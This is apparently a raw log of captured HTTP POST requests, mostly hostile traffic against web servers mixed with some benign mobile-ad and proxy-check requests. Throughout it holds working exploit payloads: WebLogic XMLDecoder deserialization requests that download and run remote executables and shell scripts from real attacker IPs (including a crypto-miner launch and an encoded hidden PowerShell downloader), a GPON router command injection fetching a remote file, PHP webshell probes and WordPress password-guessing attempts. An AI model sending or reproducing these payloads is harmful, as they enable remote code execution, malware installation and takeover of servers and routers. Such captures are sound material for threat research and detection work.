				<wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">PjjWVakHg4uoSfxdELYCzYEhvqg=</wsse:Password>
				<wsse:Nonce>Y2E1YTAwMDA0MjY5NThkMjRlYTE=</wsse:Nonce>
				<wsu:Created>2017-04-02T20:26:21Z</wsu:Created>
			</wsse:UsernameToken>
		</wsse:Security>
	</SOAP-ENV:Header>
	<SOAP-ENV:Body>
		<tds:GetDeviceInformation></tds:GetDeviceInformation>
	</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1424
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/xdxdxd.exe&apos;,&apos;C:/Windows/temp/xdxdxd.exe&apos;);Start-Process &apos;C:/Windows/temp/xdxdxd.exe -o 213.32.29.143:14444 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache

Q6YNxI+bYJ6zsamot0iFG1pRmwMxyIEMrPHe2DHVQgQYwSAQmgsHxpBrs+cU37mmy4cI1GsCdNccmHGQPPrgM9HKyRiPH9nbLgQRei21bxnkgMI8+opBkjNdZClI0oTgSjcPl1VOX+hNbaq4L6EsSClmClQfEDqRLGRdEGmHqaKsNFm991yYRSCmMLTrmdM+NFh2x2SdVtq2/WpQLqZ4KCVXFsAohxVhLDv2dvhayH6AQ3LxHJpW9/dVjIo1ALYcXZQ4V59OBXKPDAnPcySmug96Fsl6MgXzvgxV7RueHydGF3IsG8vV89qNm71bK26bs8VlG5DWxMCN+YUKuvend5BiEdXQu2KXBMzJhil7IW5Ey8CnJH67bCnb3Q8CNJ8=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
GˇuÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î·/Y›∆√«∆fl

POST /command.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Host: x.x.x.x:80
Connection: keep-alive

cmd=cat%20/var/passwd

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=172&pwd=1728888

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÜôOÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
l»9≤Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache

RKxdyNLANZ9GvMXQ7bV9F3FnXoGn7qCLmXWEcOqP3PXFr/kGOhdQIIq3wSpCAZIknCtIV91pF95q95f/iwCrTBAFfXquof+/iBgnKIUSEaqqwryPDyOpKh9wDiTo7XzfifqDV7MausQibjtWE5e8JdkM1oYsvdFK6OSsuZTYOFkElpgAvflTgQgDN8SNNokA6cGBvepxO0/iTRjaA45e2+5IyGhlCrvx/nNLDvdMmj8Jip15BBNpDsOEggYF/zsv0RmBzL7z64/o7Gtrl5YsLLbX7R6vCpK9MxAJqK+A1oqXkPpRgLJ66IgKa/nPp0tna9jTdxeCcaKBARjrbGv6OehTFcjiMDhp6C1g+asz/taWIT5O3EOjHoHBCucnvyKyGKQpj6YHMCaU+3I/KljBtilduI0K5+ndOpUhqknbToMiWuBikJF6L6xtwQ==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

463179
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

2f43c130eaa57650e3c339dfeffc6aa2
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8--


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ô¶F&Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¥Ò2Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂”â
Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

FvQNk9PPNbWbBENdUhGqVhY0fNfYfXmvBCohuXLdEgbVyqddyV6TJFilzjm+yDgrVxdU1puy3TIjs+p0FugZX/9ztMtdiJfi7Z0fTsSNgV+pfxTjIjcvRz18bqWOwHfoV7te7Ght13fMBjk8INffOLb9JNqg0JK7WcPkCHgZedKJ4r4NyOfKKIYWgHIFZGXtFelQ+bCwiJRYCaeR2fm7Ux5vWFnoYBElryyYKZ4EL4G/nOq8DcR+lGvq6zvoHK+uLhoBOGuPdyVfrzQxqIQy1L4mK0a2s6lLXK5JXbzotB0BDUTl78Mp3YirkVbrYBQ/G5L/S4VlhOrFItVUOgzHIpkjz8BbNgk7qwgKe6cSTLW1w+eoG60BYOUMKFjkZeKa/P2ommk=

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 18
Cache-Control: no-cache

log=admin&pwd=4444

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: gzip, deflate
Accept: */*
Content-Length: 103

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://149.28.96.126/80`&ipv=0


POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache

FvMMwNudMa34e5CXwueLNwTB+h6STsXnUrsshjA4rXuuOCcN4kD6ToO8QHc5jB66ZgTcTjwepzOoD/uDMMMtoF7LFxQYwGleFotZ8jLOBaC+nkrm1wKPnV9JKF06Ww1Uu5RK0cTidrI/w6Sv0/7AoYQRv9EavVOR7iL91SfAExW24UIbBzcVjBooyLCrTvAsgjmY8YHBKqWrxm7G6rNIORKHhGPabk+KYIGeE/GZAbjTeuy1hHetqW71k/oB30kct7J+bP+Hi1lPYRWQ5kdR5hJs9Qe3eiMwuuSlsEAOwM17cxjH/P86Y5Py8UaOaUEg8T0r91TfHBwOTitkOE1buKm+2ziwN5rBqwm1jyQ/f3SkN3hQT//Z

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
®}fi›Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84

{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST http://t12.proxy-checks.com/favicon.ico HTTP/1.1
Host: t12.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST / HTTP/1.1
Content-Type: application/json; charset=utf-8
Content-Length: 272
Host: x.x.x.x
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.2.0

JjgLpJThhPlCRCZKjJDmQkmFe0K6eBC4Ag2ypIRPNLTLbgH4ZK/1pK9VdnFiTqgGuZTVOd/dTRFg
7NPYHwj1hpDl5FQyTmkJUluGphomv7RkCpZWMw66G6+Iv22FYvwqjkcZQMAPcvM8f0MfepXYgt+P
pXjTsw1afq+mDCOYJo52GWJnWCkOa/TYebHJzPnw92q3LN+o2WP88MIcwLEiZwUp1NVx0CCbqv6R
PQBhvH2p+LgqXgI4h8lOcpLBM5h/lVnTAHRf69E=


POST http://check.proxyradar.com/azenv.php?auth=152329428127&a=PSCMN&i=1082776602&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1301
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;@echo open 46.101.137.203&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1049
Content-Type: multipart/form-data; boundary=q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

798627
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

71f8b0cd9df76b3b972215c5c55e647e
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu--


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
l»9≤Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Nà§Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îê˜Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84

{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
  <u:SetDHCPServerConfigurable xmlns:u="urn:schemas-upnp-org:service:LANHostConfigManagement:1">
   <NewDHCPServerConfigurable>1</NewDHCPServerConfigurable>
  </u:SetDHCPServerConfigurable>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

POST http://d.applovin.com/device?api_key=xspEme-PgTSApB2pv5Z2wJD07-1BTL-PCndyPcM54qFu_HhvNFyHZAIg9Ktcfr0sbdp0FA5J-LB-ctu_6qGg-Z HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 944

{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":135,"FetchNextAd_time":2355679,"SubmitData_time":345802,"RepeatSubmitData_time":298343,"RenderAd_time":1148002,"TaskDispatchPostback_time":311042,"ad_session_start":1495520632845,"FetchNextAd_count":133,"RepeatFetchNextAd_time":437751,"RepeatFetchNextAd_count":19,"RepeatSubmitData_count":15,"TaskDispatchPostback_count":29,"TaskCollectAdvertisingId_time":15900,"TaskCollectAdvertisingId_count":29,"SubmitData_count":25,"RenderAd_count":47}}

POST http://check.proxyradar.com/azenv.php?auth=152812500905&a=PSCMN&i=759092145&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://check.proxyradar.com/azenv.php?auth=149522191151&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://check.proxyradar.com/azenv.php?auth=149653732197&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

RvRXlI/JbTUdHwro6JxrPxh65dOpZ/aSZWjHMLht7wiMRDcw//2ZlAZgVDhrNmgwTCkZSG2rm9Qr4pFxLzEVK12yHnJPI9wuHyYaF2uvrAUQcoQGj8LhSu1dpYjVwVbtuKVJexINePsMuaHcTDHOiqdOOHTEnSrYsu8ARJQmLs+JvJam0d4UrCwgq6hEl+qfsGh0otWRUE8Q6D0lCUBJnaNCvlRYwEMr+gE+Ed8tuWyQe7l84D0In7PafAwJ6A3XmyeQjiCtfZYaX2hVxPXV534f40LULtkvky/uqzpXdP4BvcowbIM0WSt+0VMBufkeJacPjSPYevMazNX+ZiwFxjxHQL663GKBjtm6UkiAwZHAMTs/xw62K8EanxE4zeOSXmrOQuy6zrQYb7APuhyZIsZpFYO6QD4GEkNq8M80QIYMbTU3/A==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
